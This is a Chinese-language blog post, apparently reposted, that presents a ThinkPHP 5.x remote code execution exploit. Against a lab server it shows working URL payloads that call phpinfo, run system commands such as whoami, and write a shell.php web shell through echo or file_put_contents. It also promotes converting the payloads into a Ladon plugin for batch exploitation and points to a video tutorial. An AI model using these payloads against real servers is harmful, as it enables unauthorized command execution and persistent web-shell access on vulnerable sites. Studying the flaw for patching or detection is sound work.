Ladon插件ThinkPHP 5.0.22 5.1.29 GetShell Exploit

Posted K8哥哥

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Ladon插件ThinkPHP 5.0.22 5.1.29 GetShell Exploit相关的知识,希望对你有一定的参考价值。

前言

使用Exp生成器生成Ladon插件实战,Thinkphp GetShell

漏洞环境

使用docker ThinkPHP 5.0.20

复现测试

Payload:

http://192.168.1.37:8080/index.php?s=/Index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

执行命令

http://192.168.1.37:8080/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

写入文件

GetShell1

http://192.168.1.37:8080/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo 111111>shell.php

GetShell2

/index.php?s=/index/ hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=URL编码内容

视频教程

通过EXP生成器将以上Payload转成DLL,使用Ladon即可批量利用,详情请观看视频教程

Video: K8Cscan ThinkPHP 5.x RCE Exploit









以上是关于Ladon插件ThinkPHP 5.0.22 5.1.29 GetShell Exploit的主要内容,如果未能解决你的问题,请参考以下文章

ThinkPHP(5.1.x ~ 5.1.31 5.0.x ~ 5.0.23)GetShell漏洞

Ladon插件实战 Weblogic CVE-2018-2894

ThinkPHP5 远程代码执行

Vulnhub-ThinkPHP5 任意代码执行漏洞

如何从 iOS 应用程序调用在 Python 的 ladon 框架中开发的 Web 服务?

Ladon批量检测漏洞 SMBGhost CVE-2020-0796